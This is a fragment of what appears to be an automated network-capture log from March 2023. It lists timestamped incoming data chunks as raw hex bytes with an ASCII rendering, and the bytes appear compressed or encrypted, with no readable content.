13 74 Data Ascii: 27A"Vuz1AMH8I%mdmW_zDNf~_~b/KH~bmg$.={b\Fi;l3>Uir#EwP +:jC>wy{r,#HFr^?[+Hk[#YsjGJ;\|#RmLcGvG[&3/dY#x4.oNnXUt
2023-03-02 16:19:42 UTC	366	IN	Data Raw: a5 49 b1 0e 1e 1a c5 5b 63 62 cb 2c d3 9c ae e1 b8 d5 c7 24 93 92 87 e0 60 34 55 6f 4e dc e0 80 6e 16 09 b7 c1 51 fa fa 52 4a af bb f0 7c 25 10 45 2a ba 1e f7 3d 45 f0 19 b3 50 a9 0f d2 78 3c 28 ad 55 33 55 c2 a3 de 66 7e 84 9c 5f 58 e1 09 22 4d fc e8 60 6e e2 6c 81 3a 8b b3 59 d2 85 3b 04 55 f1 60 47 3c 52 15 c0 8b 5f 08 61 5a ba 85 80 29 b1 ce 08 b7 ff b3 3d 2e d6 4e 58 6c 3c cf 12 e6 98 27 8f df c6 30 57 21 ba 76 0f ae 36 91 24 8c b1 80 09 51 83 cf 1b 8c 38 2b b0 60 ef d8 ea 08 27 8f 49 16 c0 13 72 26 49 c6 3b f5 4d 67 e4 44 e9 18 49 f5 3c d9 e5 6e 23 2a 9e 75 db ef a2 8b 9b 46 43 e7 8c 69 73 ef 2b 57 9a ed 5b f6 5a 92 7b 58 ae 7f ec 58 b0 de 36 28 c0 f4 47 48 54 e3 68 7d 9b a5 ed 92 a5 10 35 f5 3b 0c 03 a4 a6 40 18 f7 80 fe a5 bb 73 97 55 7b 18 dc b1 Data Ascii: I[cb,$`4UoNnQRJ\|%E=EPx<(U3Uf~_X"M`nl:Y;U`G<R_aZ)=.NXl<'0W!v6$Q8+`'Ir&I;MgDI<n#uFCis+W[Z{XX6(GHTh}5;@sU{
2023-03-02 16:19:42 UTC	367	IN	Data Raw: 44 e0 fe 62 48 83 77 95 08 3f 3e 97 5c 22 21 1c 6a 63 50 c1 19 e0 64 8a 48 12 b2 48 00 51 fc ad 74 c5 cc db 5b 20 9c 41 bb d5 65 d7 c0 e1 4e eb da 14 34 6c 13 d9 32 9e cf 25 02 7a 99 09 11 17 f9 16 a8 0c 09 8a 40 84 ee 34 5c e7 25 3a db 85 08 0a 3e 72 bc 62 b9 d1 52 9e fa 73 94 31 6a b1 4c 40 59 86 15 fe b8 a4 1e fe 3b 74 fc 02 6a 17 5a f1 e4 ce 82 42 23 f6 30 4d ea 41 35 13 af ae 65 5d 5c f2 bb b5 fa 00 b7 26 b7 f6 de 0d 22 07 48 b0 d8 7f c9 96 93 e9 46 59 02 86 67 7a ba be da 6e 30 9b 37 24 7f e2 a4 8b a9 cf 89 2e 1b d3 0c a7 e6 d4 2e 9c 00 48 da 0d 4b 01 07 aa a2 cd 51 e4 00 90 0b cc 2d 72 84 30 e7 93 3d 23 c2 ef 96 30 eb 3d 44 fd bf e6 67 52 01 57 93 7c 1c f9 ec d2 9e 96 34 36 61 26 15 15 d8 96 e0 4d 7a 10 a6 07 34 c4 4d 57 cc a3 c0 a3 3f 62 53 d5 c4 Data Ascii: DbHw?>\"!jcPdHHQt[ AeN4l2%z@4\%:>rbRs1jL@Y;tjZB#0MA5e]\&"HFYgzn07$..HKQ-r0=#0=DgRW\|46a&Mz4MW?bS
2023-03-02 16:19:42 UTC	368	IN	Data Raw: 67 fc 1b d0 74 40 1c e3 fe a1 b1 e3 71 20 ef 34 34 e0 c9 1b 68 1a ad f8 3d 07 6d 97 75 aa e8 19 a9 1a 86 28 9b a4 65 df be 43 af f1 a0 d9 11 c0 3c 09 b2 c0 32 04 8a 75 9a 0e 8f 22 ea 32 51 4a bd f0 51 c5 ca 64 71 9a bf 68 5e 64 46 d3 62 80 23 8c 19 00 14 ea ea 15 88 b4 4f 0d 70 dd f9 72 4b fd 17 7b 1f b4 89 35 9b bd 05 3c 25 6b 2a d7 8b 07 eb 8d 8b a4 66 8d 9a 4a d6 a1 72 66 4d 08 78 97 7b 8e 12 85 03 2e 08 22 52 11 94 fa f2 a1 4c 18 9f f0 39 fb d2 39 02 a5 76 a4 af 4a 16 20 3b 49 b9 19 1d 7f 58 e8 6a 13 e1 07 a7 32 4a ef 22 17 b0 be ce 06 1a 76 90 2f 8f f2 f3 b9 72 96 00 e0 a7 ed 31 80 e4 bc 48 a1 3b 02 1b 1a 8b db 6f 2d 67 e6 2e f7 73 48 bb 65 a6 8f cb db 8b 66 91 bc 77 a8 9b 56 e8 f3 5f 6d e0 bd 88 20 d9 b8 83 ea 06 42 d3 d0 e8 e5 8a 9f 19 bb 38 8e 70 Data Ascii: gt@q 44h=mu(eC<2u"2QJQdqh^dFb#OprK{5<%k*fJrfMx{."RL99vJ ;IXj2J"v/r1H;o-g.sHefwV_m B8p
2023-03-02 16:19:42 UTC	370	IN	Data Raw: ca cc 9d 67 31 5e 8e b5 d8 c0 74 b9 05 ec 70 e7 40 d8 32 06 d4 0e f5 c2 9b ed 1c 57 c1 d9 41 4e 34 d2 98 9d c6 30 cb fa fc 1c c0 08 8f 8a 72 69 a9 61 57 86 47 25 be b7 2c 56 d6 23 90 8b f1 d3 ba 23 86 11 b8 48 2c 96 1f c8 af fd ed d6 2e b8 6d 0a 2f 71 5c 1d 21 5a b8 46 dc 30 72 4c 03 2c ae ae fa 3e 06 ac 8b 4f 03 4e ae 81 9a fd 69 f4 00 c0 bf 78 a2 d8 24 71 90 61 ac 67 36 b8 0b fd 02 26 2d 72 c4 60 3e f2 c9 b0 7d fc 44 ca b9 c3 85 08 6d 3b 6c a6 a6 2a b7 66 90 5c 2b c1 07 b8 1c 7c ba 6f 86 1a 89 1c 04 43 3e dc 89 70 99 20 44 71 2f 40 4c 24 73 15 16 a8 7b f4 8c 79 9b 4e f6 15 25 36 b9 9e 4a e9 f4 28 16 8a 88 75 62 15 d4 98 76 0f 19 4a 00 30 36 3c eb fd 6e d0 98 ad c2 11 3e 6f 0b 22 a1 a8 ca b5 45 a1 e0 83 1d d3 a7 c0 a8 25 d6 a4 cf 97 48 eb ce b8 be 94 b4 Data Ascii: g1^tp@2WAN40riaWG%,V##H,.m/q\!ZF0rL,>ONix$qag6&-r`>}Dm;l*f\+\|oC>p Dq/@L$s{yN%6J(ubvJ06<n>o"E%H
2023-03-02 16:19:42 UTC	371	IN	Data Raw: 64 e5 f8 de 08 71 44 d8 24 be fd df 0f 13 4b 36 68 59 2b 67 3a 88 8a 9d fb 06 2b ab f0 a2 c9 ee 66 06 b4 12 cc c4 1e 1c 2b 7e eb 1f 94 2f ae 08 c2 a5 eb 6a 76 6f 1a f6 61 15 50 50 de a1 e2 30 b7 42 27 97 65 f5 e4 8d d1 01 56 42 95 e7 b1 8b 9b 22 3c 9e a9 37 90 55 15 e3 09 86 aa 6a f9 80 13 a6 8b 54 85 3e 46 45 5a d5 20 d8 e6 3f 8f 73 3d 88 41 c9 d3 c7 41 27 80 fb 5c 6e 36 ae e8 3d 76 35 19 b2 5b 3a be 06 d1 e8 10 f9 3b e5 18 34 5a 0e 5a 00 e1 1a a5 a5 2f b0 ad 8f b3 cc 28 0b 3b fa 65 71 61 fb fb 9c 13 ae ae ac 6e e2 ea 56 ba f5 75 93 9d 5d a1 a4 e3 7b 8b 08 bf c0 5f 5a 67 7b 14 2a 0b 0d ec 86 b9 e0 c4 1f 38 b8 45 f5 84 9b f7 f8 a9 f2 c7 0b 90 53 28 16 42 fe df 78 f3 d3 ff 5d 65 d6 80 58 68 3e 3b 60 5b fd a5 59 4c d3 54 15 eb 2e ee 61 06 f9 0f c0 7f 00 0e Data Ascii: dqD$K6hY+g:+f+~/jvoaPP0B'eVB"<7UjT>FEZ ?s=AA'\n6=v5[:;4ZZ/(;eqanVu]{_Zg{*8ES(Bx]eXh>;`[YLT.a
2023-03-02 16:19:42 UTC	372	IN	Data Raw: f5 22 38 a4 8a f2 40 e4 eb 44 b1 8b 36 35 82 70 72 fc 07 99 04 1d 20 35 0d af ce 18 11 c6 c8 75 c5 46 2f 65 ba 8d a8 39 df 36 39 85 31 4f a8 b1 8d 0d 4b ad 50 c9 44 a3 26 61 3b d8 c0 47 be 92 9c 51 d2 0b 65 d0 a9 7b bd 68 d0 66 f0 1e 1e f6 d0 28 14 60 d4 01 54 6b 3d d8 9b 2b 73 a4 46 a9 2c 2c 66 61 81 22 07 1f d3 da 13 3f b8 21 53 86 1f 63 ba c9 03 44 65 52 eb 5b 42 2a 97 38 5e 66 68 94 4d ca 8b 4e a8 62 ae e9 bd 28 28 d4 9a 92 2a 7e f5 f5 64 7b 60 6e a0 e6 61 fa 90 85 14 7c 7c eb 40 ed d9 d6 b2 e5 2a b8 77 99 9d dc 39 fc 30 f9 d9 83 d1 d9 d2 21 e6 ec cb aa 7f a9 c1 d2 8d 96 3f cc 14 d8 87 8c 13 37 37 1a 0c 86 cd a5 0b d7 1e 5c 42 21 d0 5f a4 56 e2 01 69 ae e9 24 31 28 27 60 b1 57 e0 74 d9 e8 00 a7 36 67 3f c2 5a bc b9 fc 65 7b 14 a1 f8 70 4b 25 cf b1 b3 Data Ascii: "8@D65pr 5uF/e9691OKPD&a;GQe{hf(`Tk=+sF,,fa"?!ScDeR[B8^fhMNb((~d{`na\|\|@*w90!?77\B!_Vi$1('`Wt6g?Ze{pK%
2023-03-02 16:19:42 UTC	373	IN	Data Raw: 61 57 11 2f 8a 5c 5b 03 0b 59 cd f6 c6 3c 3e b1 c2 7f 86 29 9b 14 2d e9 02 06 86 21 4d 55 9a 5f 80 73 58 30 07 a1 5f 72 26 29 e9 20 b4 f7 5c de 63 a7 88 7b e4 b0 8a 37 de 86 cc 47 f4 8c 8e 1f 94 e7 55 06 a2 37 3d 8c 44 1e 4c 25 db 98 28 e3 90 7d 1f 03 81 05 8b 5f 68 2e 5d 9b 5f 74 60 f3 35 2b 17 b7 45 28 5c 8e 56 2c a2 d5 ce 70 65 2d fd 17 53 8d 1c d8 76 73 e0 ec 21 2c 38 e4 5a 09 1d 92 84 84 7b 7c 25 75 e1 15 cd b4 ff 29 9d 22 46 16 5a 2f 3d 0a e4 17 b7 4f 63 ef 16 0b e2 d2 a3 4e 9f 98 29 67 92 45 fd 5c fd b1 c7 a6 66 f8 14 4c bf a8 d7 28 bf e9 ae fe ce 0e 22 c0 a2 0f ae d5 59 54 14 d9 70 31 72 4c c9 d0 89 d2 4a 27 90 be 39 35 e9 70 30 2d 59 16 56 4c ae 85 64 1d 8f 02 8c 29 64 a6 80 9f 8a c2 37 30 00 8a fa 63 ec aa d1 de 2e 37 75 4c d7 54 69 7c 4a 4f 69 Data Ascii: aW/\[Y<>)-!MU_sX0_r&) \c{7GU7=DL%(}_h.]_t`5+E(\V,pe-Svs!,8Z{\|%u)"FZ/=OcN)gE\fL("YTp1rLJ'95p0-YVLd)d70c.7uLTi\|JOi
2023-03-02 16:19:42 UTC	375	IN	Data Raw: c2 f2 88 97 cc 02 ae 32 27 3b 6b 53 08 65 d8 aa 5c bd 0f 07 42 1a 3d 4e 0e d5 72 1b f0 ee c7 ce 35 f0 db 62 5f b4 8a aa cb 08 61 82 a6 ea e6 09 6e 82 1d 95 7b 5e 22 7f 9b 4e 96 45 c0 c4 e1 77 0d 9e af 4b a0 c8 3b fe a6 5c 41 78 8e 7d 84 31 6d bd 16 1d 22 b8 36 53 69 0b 54 45 d0 8f ee e5 84 d7 04 c5 e8 16 82 fa f5 a6 a8 eb f5 5f 3d cd fb 4a 88 ce 59 e8 72 46 d3 3c d2 97 93 af 85 3a a8 a5 d7 58 be 79 8d 34 58 d7 f9 40 a0 6d 38 aa a4 4c 18 72 7a 85 3f 68 ac f3 91 4e be dd 5e b1 45 f1 48 ea bd 02 bf 8c 82 8f b0 95 a9 10 d0 78 95 d6 3c 0c cb 31 76 7a 6b 16 31 5f f6 a1 8e ed f3 b5 58 d3 5e 40 d4 c1 b0 20 b3 32 64 d4 bf 35 cd da 7b 62 60 0a 2e 18 04 f9 75 0d 74 4a d8 ea b0 09 ba 30 2c 1a 6e 22 bb 85 0e 59 1d fa 92 9f c0 e2 c4 70 07 0c a1 45 ca 5d fe 4a f4 b6 c8 Data Ascii: 2';kSe\B=Nr5b_an{^"NEwK;\Ax}1m"6SiTE_=JYrF<:Xy4X@m8Lrz?hN^EHx<1vzk1_X^@ 2d5{b`.utJ0,n"YpE]J
2023-03-02 16:19:42 UTC	376	IN	Data Raw: 92 0a 67 c0 8a 22 50 a8 a4 f1 fd 78 b6 08 00 77 ac 4d 02 d9 6c 07 1e db 46 ae a0 13 44 63 e8 8c 29 5c f2 31 47 ff ed c1 49 18 36 69 6d 55 d2 5e d6 f8 9a ac 40 a8 79 76 44 14 e9 4b bb 0d cb e6 03 de 14 a1 ba 49 92 ca d8 ff 9f 70 fe d4 46 a2 70 36 0f 14 6d cc 22 26 81 66 dd 3e de fb c8 bf ae ed 22 97 3b 2d 6d f0 32 18 52 f5 78 92 73 3b 56 5b 2d 31 dc 82 77 b6 93 f2 71 38 92 0a d8 73 38 39 7d 53 28 b9 19 49 fa af d0 f8 ba be b3 7f df cb ac 22 eb d2 fb 55 b0 06 a2 d6 5e e9 83 78 e2 26 51 6a 50 5b 9c 96 46 1c b1 12 09 18 b2 99 ee 82 59 54 17 5e 5b 37 1c 1d 89 94 b5 11 8b b3 69 99 1d a3 42 4a a0 71 60 01 20 d5 20 e5 fa d4 7b a5 39 31 e4 49 0b 92 25 31 fc 81 8a 02 38 93 6a 7d 69 e3 9b 4a 26 60 84 bd b3 00 ff ff 50 0e 47 28 00 01 76 9c 70 df b8 b1 ad 6f db f8 80 Data Ascii: g"PxwMlFDc)\1GI6imU^@yvDKIpFp6m"&f>";-m2Rxs;V[-1wq8s89}S(I"U^x&QjP[FYT^[7iBJq` {91I%18j}iJ&`PG(vpo
2023-03-02 16:19:42 UTC	377	IN	Data Raw: 8a da 3e 6a f3 cd 16 40 43 65 5d e5 2e 85 7e 40 f0 0d d0 4c 44 08 28 6d 69 cf f8 fd 10 b8 1b 96 dc a0 31 8d 7f 06 8a bb 41 a1 8c b5 a7 e0 df 10 3d 8a 90 66 a9 5b f9 c3 20 cc ea 3c c4 16 30 28 04 ff ba f5 dc ba c3 1e 78 3c dc 82 43 fd fb d3 17 42 ba c9 bc 1f 34 48 cf fb 15 d6 29 aa af 49 c2 c2 80 5e bf 01 b4 da 7a 7e 00 33 d8 f2 98 fa 64 96 43 a3 08 b7 d3 24 5e df 94 b8 ba 0d 39 42 45 95 f6 76 71 69 1a a7 6b 78 65 39 fd 2d 23 f8 40 26 94 77 56 d5 37 7d 86 16 29 c7 a1 58 80 3d 81 39 a8 d1 81 bb 60 78 d8 7f ee 61 50 f6 34 d7 23 e7 9a 29 7c f0 06 1c 48 a9 b8 dd 9a d5 e4 16 fd 66 67 82 65 de 50 7b 2f 4c c6 24 cd 94 3f aa ba f4 11 7d 94 d3 07 4c 62 f0 02 aa ad 03 62 69 d6 8b 76 35 c3 5d b9 b4 68 5e f0 c0 ad cf eb 6c d6 79 90 5e 25 5b ac a5 ed 5f d0 99 6c 96 25 Data Ascii: >j@Ce].~@LD(mi1A=f[ <0(x<CB4H)I^z~3dC$^9BEvqikxe9-#@&wV7})X=9`xaP4#)\|HfgeP{/L$?}Lbbiv5]h^ly^%[_l%
2023-03-02 16:19:42 UTC	378	IN	Data Raw: dc e2 9a 7f db 0b 07 3a 6f 77 44 12 5b 07 fb 7e df dc e8 16 b3 90 3c de 0d 94 72 da c2 8e f9 36 fa f4 21 46 be 25 cb d2 3b 0a 96 ab 86 a2 fd c1 1f 34 ed 1c f9 90 53 03 e2 62 53 6d 0b 54 83 01 20 a7 fd 78 c5 8c 01 9b 73 f3 96 fb 9b 84 00 fb d9 42 bd 53 9f 88 89 86 d9 66 e6 5d dc fd 46 53 17 f7 af e7 c8 07 07 e5 11 fe b3 1c Data Ascii: :owD[~<r6!F%;4SbSmT xsBSf]FS
2023-03-02 16:19:42 UTC	378	IN	Data Raw: b7 35 36 6c 36 6c 9a 5d 16 ce 57 45 cd 23 29 9a fd b9 b0 88 5b b8 10 9e 7b 4e 28 b8 47 e5 be 61 22 38 e0 88 84 28 11 c7 c6 b9 cc 7b 87 bc b1 c7 51 37 f0 bb 40 9f e6 87 13 aa 9f 22 24 46 02 c7 5c 7e 11 e5 57 c5 d4 b5 88 e3 c3 48 e5 2f 38 5e 13 bf ba 5c 28 cd 2d ca bb 74 64 36 77 25 64 ac 0a 70 c5 ee f7 26 8d 5e 53 2e 05 12 1c 7f 7a 0e f5 29 5b 9b dd 0f 3e 00 d7 98 e1 19 14 2a 31 c6 7c 41 3c 86 5f bb e7 1a 64 87 84 3f 27 df 8a 9f e1 6a 33 ca 88 b6 69 e3 d4 38 4e e1 59 05 4f 68 3d 07 45 ca 36 23 16 3c 3a 00 a1 bf e3 cd 40 4f f4 0b 18 a9 5c 51 60 14 4c 86 7e e7 ae bd 4d 02 bf a7 4b 8e 93 dd a0 ca 2e b2 91 ff 49 cc 19 cc b6 77 53 8e ba dd 5b 24 69 21 9a d2 11 54 a2 05 b4 74 63 f6 a2 74 7d 76 58 93 15 60 4d 6b b7 9e 65 83 83 77 30 2f 19 77 ab 5c 71 b8 54 48 62 Data Ascii: 56l6l]WE#)[{N(Ga"8({Q7@"$F\~WH/8^\(-td6w%dp&^S.z)[>*1\|A<_d?'j3i8NYOh=E6#<:@O\Q`L~MK.IwS[$i!Ttct}vX`Mkew0/w\qTHb
2023-03-02 16:19:42 UTC	380	IN	Data Raw: 5b dc 6b 58 da 85 fc c4 01 ea eb f0 d2 88 8d e8 e2 87 94 fa 7d 14 41 36 86 dc 64 8b da 80 78 ee 1f f2 fd d3 eb 01 38 2a 8d 20 b0 b5 f5 f4 c8 d8 29 ae 19 cf 43 0c 1f 29 73 ad 86 39 f5 5d 1f 97 fb f7 3f 12 d7 81 32 49 9a 87 d4 b9 67 e6 7c 7b 4d 53 d1 0e d2 ff b1 6a ac 1e 76 cb 1f 70 de d9 4a f0 9d db d3 27 e6 3e 12 e3 91 3a a8 38 29 af 6e fd 27 0a 18 a0 b8 11 19 86 10 ac 85 cf f1 4c 42 45 1d f5 d5 fe 0c 18 46 9e 5e 31 18 c8 35 8d 97 39 b5 d0 c1 fe 60 05 56 83 f0 8e bf e4 bd 6d f7 1f 97 7c 9b 37 53 ad 8e 0c c8 65 c1 55 e7 dd 01 7e c7 ce 3f 1b 89 6e 08 43 3b 4e 47 3b 01 3f f8 c4 0b ac 6d 01 ee 12 5a 55 92 83 48 3f e2 46 b4 d1 94 e6 0e 71 4a c5 58 e5 38 b6 59 6c 0e 93 1c 81 1f 5e 8f aa 3b 46 51 f2 c2 a1 d3 62 6b 95 eb cf d4 b8 53 76 68 e9 a1 a0 4b a6 89 80 96 Data Ascii: [kX}A6dx8* )C)s9]?2Ig\|{MSjvpJ'>:8)n'LBEF^159`Vm\|7SeU~?nC;NG;?mZUH?FqJX8Yl^;FQbkSvhK
2023-03-02 16:19:42 UTC	381	IN	Data Raw: 10 59 c6 60 90 6f 10 be 35 d2 5a be c4 74 bd 0d 37 0f 40 a0 49 49 f2 42 4b 1c 91 e2 16 ba da 73 63 b7 26 d1 d4 19 4b 05 06 8a a5 0c ed 59 d7 3a 72 52 35 30 c8 b8 5e 03 bc 5c ae 96 90 25 e5 40 2a e0 d0 9d 41 dd 4f d0 04 dd 19 55 92 4b b4 4e ca f4 e8 ee b7 e6 26 7f de 40 56 22 c8 0a 0e ad dc 3c e9 78 3d a5 c8 1e d4 5d e3 57 0e f3 10 92 d4 97 a7 62 01 52 20 f1 d2 2e fb 5c 17 98 58 eb 5c aa 4a 1c 7d 50 be 3e 9e 8c 2c 70 05 f6 89 cc 6b f8 5f 49 64 e9 f7 7b eb a6 1d bf 32 ef b9 d2 ca 7f e5 1e b7 5a 6c 31 57 c3 f5 db df a0 fc df 48 bd 01 6f 6e 9c 20 ac e1 43 14 bf bb 26 7e 48 94 28 d2 42 cd cc 4a 7d 79 2d 08 83 8f 49 47 11 ca ed 67 e4 48 67 39 cf b2 86 3d 41 57 e5 d7 5d 1c 98 8b 00 5d 16 f4 3d f6 31 21 d9 78 3c 8e e6 5b f2 2c 29 1b e6 0d 01 44 0d fa a5 cb 4f e6 Data Ascii: Y`o5Zt7@IIBKsc&KY:rR50^\%@*AOUKN&@V"<x=]WbR .\X\J}P>,pk_Id{2Zl1WHon C&~H(BJ}y-IGgHg9=AW]]=1!x<[,)DO
2023-03-02 16:19:42 UTC	382	IN	Data Raw: 6b 4b 70 54 40 1d 03 b8 5c e8 89 51 a0 dd 1a cf 2f 6f 46 fe d7 d8 8f 2d 49 2f 1f 98 44 3e 8e 4b d4 46 bc 30 bc 9e d5 d6 f7 c9 4a 23 08 0d 90 26 17 86 4c 8b 33 6e dd 99 44 f1 b3 3c a2 1a 02 7e d9 3d 27 f6 23 be b0 df 86 44 f7 a5 c4 96 43 22 86 b1 4b 26 5a 17 bf db 1b c7 d7 5b 32 eb 61 6a c1 03 83 9c 91 f1 6e de 20 69 74 fe 7d 13 08 10 79 50 d5 be 08 db 8d ee d7 4e c8 22 9c 8e 16 9c 5b e0 ac ff b8 eb 2b 64 ce 3f 18 3a 95 03 51 64 9f f6 fa ee ab 75 f7 60 f5 cd 8f 5e 0a 8a 78 ba e4 b0 47 b3 02 9f 18 6c 5f 9f 94 50 be 80 45 53 be f0 47 99 fc fd 6b 96 af 10 b3 30 02 87 a1 24 11 6e a5 55 45 55 63 8d fc c5 a8 40 df 9d e6 74 99 9d d4 95 c6 01 b5 41 5e eb c3 9f 3a c9 c8 03 a3 78 ee ea 0f 92 31 d6 5a 7f 52 5b a9 19 a7 45 bb d3 78 02 e2 17 53 6d ed b9 13 66 02 0c f5 Data Ascii: kKpT@\Q/oF-I/D>KF0J#&L3nD<~='#DC"K&Z[2ajn it}yPN"[+d?:Qdu`^xGl_PESGk0$nUEUc@tA^:x1ZR[ExSmf
2023-03-02 16:19:42 UTC	383	IN	Data Raw: c6 12 e4 62 a5 da 0c aa 65 16 d4 c5 26 77 66 3a 68 5e 2d 01 35 85 44 af a6 80 cf c6 8a 34 d9 1b b2 88 c9 18 7f 24 f0 97 0b 85 a0 d3 53 85 7d 75 6e c2 47 f9 56 14 0d 5a 89 57 be 95 37 37 54 85 d6 d1 ba f3 50 8e de f6 18 5d 04 8e 7d c3 09 02 eb f8 5e 1c ad 75 6a 63 b4 7e ee 78 f9 49 54 25 bb ab 2b f9 7a 7d 76 58 44 e1 05 e4 b1 f9 c3 3b af 63 02 a3 ae 02 a5 6b 30 ec 27 de 0f cf 7e 5f 8b 86 0a 0b 18 cf 1b 5e 3d f5 ff 1a 30 15 d1 30 aa a7 b1 ea 3c 77 cc a1 ae 20 60 df df 34 94 81 77 4b f6 9e 7a 76 f1 72 ae cb d4 51 78 b4 d6 f2 43 68 4b 48 03 eb 8a 6b bf 18 3a ad 92 ad 89 45 6f fe 4e 00 39 06 77 9f 6e 30 f7 d8 7d 35 13 c1 aa 9d 8f 78 bf 84 a4 f0 15 39 17 36 ef d9 a4 e7 41 a9 fe 84 c5 49 c5 59 03 86 59 b9 b1 bf 64 76 fc 3c 15 90 ba de 7d cb 53 39 14 ae 5a 80 6f Data Ascii: be&wf:h^-5D4$S}unGVZW77TP]}^ujc~xIT%+z}vXD;ck0'~_^=00<w `4wKzvrQxChKHk:EoN9wn0}5x96AIYYdv<}S9Zo
2023-03-02 16:19:42 UTC	384	IN	Data Raw: c1 20 b0 cc 20 91 2c d5 fa 5a ab 76 5f 64 46 85 fe 19 16 2d 9e 53 a1 c9 09 5a 6c 3c ed a4 3d b6 4a 9d 34 88 ab ba 77 f7 01 ce 3e 7d 1a aa ae 28 3a 60 10 8f 54 f8 98 45 4e b3 ad 84 48 5c 3e 2b b1 95 70 dd 8a a6 d3 2d 47 36 d2 a1 64 b2 a9 bc 0b e8 f1 bc 01 84 9f 29 02 06 fc 25 d3 0b be 86 e4 15 85 44 2e c1 6c 69 e2 db 82 f9 8d 3c c8 7c 13 26 f0 18 b1 4d 78 3a 60 a2 19 e8 25 fe 85 0d 56 02 83 5b 03 5e 0c 33 2a 2d 88 0c 4d bb 18 3c c1 95 e9 ea 9b 92 a3 cd 79 82 e0 38 55 75 93 6b 1c 49 df 45 a7 04 98 3c 8c 2e 12 04 09 e9 74 63 bb ce 87 07 70 f8 91 60 8f bd 59 48 ed ef 37 a6 4f ed 69 c8 14 91 21 66 9a 8e 59 da 57 3f 96 b2 5e 11 22 c1 57 b1 9e 37 d9 6c bc 96 d5 71 4e ef d4 f2 27 70 77 5a 45 14 c4 1d 29 68 ea 83 9a 0e 70 6a 39 a5 ca 12 7d 24 2f c2 b1 2f 44 15 32 Data Ascii: ,Zv_dF-SZl<=J4w>}(:`TENH\>+p-G6d)%D.li<\|&Mx:`%V[^3*-M<y8UukIE<.tcp`YH7Oi!fYW?^"W7lqN'pwZE)hpj9}$//D2
2023-03-02 16:19:42 UTC	386	IN	Data Raw: 96 51 36 f1 8d 51 db 1b f0 9c da 40 06 7e f3 b9 7b 3f e3 0e 5b 78 e4 61 23 bb e6 71 f0 46 4d aa 54 2a fd b0 5d df 4d 88 a2 ae fd 44 18 d8 c7 35 12 a2 b3 e0 50 fd d5 0d f0 c1 9a e0 8d 56 fb d9 54 e1 80 05 ed 61 1a 8a f7 96 71 87 37 19 db 90 6e d5 b8 6c 23 90 12 3a f7 43 04 b9 12 fc 9d ca a6 83 9c 3b 08 ab 69 be 73 fe 91 2a 4e 67 5f 44 b9 7d 69 d7 10 b5 6d 87 27 19 51 26 ae c1 ec ee 99 12 84 aa da f5 ff d0 3f 0f ed a9 66 21 53 32 c3 68 7a 60 67 e6 ca e7 9c 7e 0d 7d 47 f1 af 31 69 c5 e4 45 8f d2 ad d4 46 bd a9 5a 55 64 e0 00 bf 31 93 d2 a1 0e 5f a0 13 f3 68 ca bb 70 c0 09 b2 ae e8 56 1c 63 15 00 ed 53 9e 59 01 a8 ea 69 fb d6 c0 92 bd c0 76 bf 37 2d 44 4b 45 6d 27 89 f1 1f 80 cb c1 8a aa 6c cc 46 9b d2 18 81 07 e2 a8 b4 62 26 6c a3 99 2b 34 9d 75 90 db 22 83 Data Ascii: Q6Q@~{?[xa#qFMT]MD5PVTaq7nl#:C;isNg_D}im'Q&?f!S2hz`g~}G1iEFZUd1_hpVcSYiv7-DKEm'lFb&l+4u"
2023-03-02 16:19:42 UTC	387	IN	Data Raw: 47 fc 5c e4 82 b7 11 5b 7f 74 10 99 18 e0 46 2c 0d 59 d4 70 ac d8 18 a0 38 ea 1a 64 b9 1f d4 e6 2c 39 a4 47 af 72 b5 e2 f0 20 5c 97 c1 6f 31 53 48 ec 82 9f 0e 8c af 89 85 5b 8f 9a 99 97 0c 61 3e c4 67 e1 cf 6e bc 4f 13 2c 32 7e 84 db 2b ac 7a 0f 68 ae 69 13 7a 11 a7 37 d7 f7 88 00 e3 e1 c2 4b 08 1c 5c d0 1c d2 a0 04 e5 e1 58 0f b2 eb 7a c9 d5 74 16 1a 58 ee 40 98 0b ed fe a1 d9 b0 bf e1 3a e6 1b 18 da 8a e6 8d a4 5b dd e8 39 a0 2f 4a 99 26 d2 6c cf 05 54 5d a7 1d 6d 98 04 f0 23 4b d2 5a d8 e1 2f 9a f3 d0 0b 0c 84 c4 8b 4e 29 3b 3e a3 93 e1 17 d8 58 89 37 20 04 51 c7 37 b3 1c be 2f 75 ad 6e 6f f2 15 f7 b6 29 21 bc 99 82 9b 00 f6 2c 2c 7b df ba 3b dc a2 6f 11 3b 36 2e ff a4 31 9a 11 35 8d 0d 3d a4 ef 42 39 e4 3c 45 a2 6f e2 3e 2b a6 2a 1e a2 73 cf e6 fb 64 Data Ascii: G\[tF,Yp8d,9Gr \o1SH[a>gnO,2~+zhiz7K\XztX@:[9/J&lT]m#KZ/N);>X7 Q7/uno)!,,{;o;6.15=B9<Eo>+*sd
2023-03-02 16:19:42 UTC	388	IN	Data Raw: 6e b2 52 5e a3 8a ba 80 a4 63 e9 17 a8 10 89 01 e0 fc 2c 78 27 74 e6 b2 74 bf ab f2 36 36 fd cc 2a ab 2b 25 45 03 0b 14 2a 19 8f 0b 68 2f 13 92 3a 6d c4 40 1d ac 94 c9 22 8d dd c6 08 89 b6 d6 dc 48 08 c3 b0 65 db fb 75 af c7 fd 5e d9 d6 a2 ba 85 5e fe cf 55 3d 74 d9 88 fe af 70 be 7e 3f a7 18 48 04 bd 4c 27 3f ea 81 c2 29 c6 f2 e4 ed 10 f2 bd 68 64 16 0b 63 3b a2 bb 87 9c 83 91 1a e7 b8 ac 14 8a 73 8f 4e 37 7c ab 95 b4 88 3a 0b 9f ca 38 6b 29 90 9b 0b d7 d6 52 c8 05 38 75 52 88 1f ab 2e 1f c0 01 22 ab 1b 0d 3e 22 7a 8a 0b cb 97 31 60 6e 0d 6c 8a 41 24 c3 8f 83 fe ae eb e0 27 0e 2d 45 46 47 a6 bc 83 e8 ae 47 8a 28 d4 48 c2 7f 48 52 00 bd 88 3e e4 da f1 2d 87 d5 0a ba ca 28 13 bf 35 08 5a 06 bf 75 fa 38 05 30 d8 af f2 db ac d4 74 20 45 32 60 d7 72 4f 3e ad Data Ascii: nR^c,x'tt66+%Eh/:m@"Heu^^U=tp~?HL'?)hdc;sN7\|:8k)R8uR.">"z1`nlA$'-EFGG(HHR>-(5Zu80t E2`rO>
